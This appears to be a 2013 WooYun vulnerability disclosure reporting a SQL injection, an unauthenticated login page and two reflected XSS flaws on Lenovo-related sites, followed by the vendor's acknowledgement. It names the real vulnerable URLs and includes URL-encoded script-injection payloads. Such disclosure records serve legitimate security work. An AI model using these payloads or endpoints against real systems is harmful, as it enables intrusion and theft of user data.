漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2013-10-24: 细节已通知厂商并且等待厂商处理中
2013-10-28: 厂商已经确认,细节仅向厂商公开
2013-11-07: 细节向核心白帽子及相关领域专家公开
2013-11-17: 细节向普通白帽子公开
2013-11-27: 细节向实习白帽子公开
2013-12-08: 细节向公众公开
简要描述:
详细说明:
SQL注入地址:http://lxj.ecare365.com/HelpDetail.php?id=60000139
默认验证登陆:http://lexue.lenovo.com.cn/lms/pages//login.htm
俩个反射型xss:
地址一:http://zhi.lenovo.com.cn/fy12pk/arena/arena_login.php?
url=aHR0cDovL3poaS5sZW5vdm8uY29tLmNuL2Z5MTJway9hcmVuYS9pbmRleC5
waHA%3D%22%3E%3Cscript%3Ealert%28/xss/%29;%3C/sCript%3E
地址二:http://zhi.lenovo.com.cn/fy12pk/pk_login.php?url=Z2FtZS8%
2Fcj0xMzUwMDI%3D%22%3E%3Cscript%3Ealert%28/xss/%29;%3C/sCript%
3E
可以直接读取mysql表中的数据用户等信息。
默认不需要验证登陆虽然危害不大,但是如果拿到内网VPN账号,就可以直接运行删除和修改了。
xss测试~
漏洞证明:
修复方案:
求礼物,嘎嘎~
版权声明:转载请注明来源 xlz0iza1@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2013-10-28 11:23
厂商回复:
感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞
最新状态:
暂无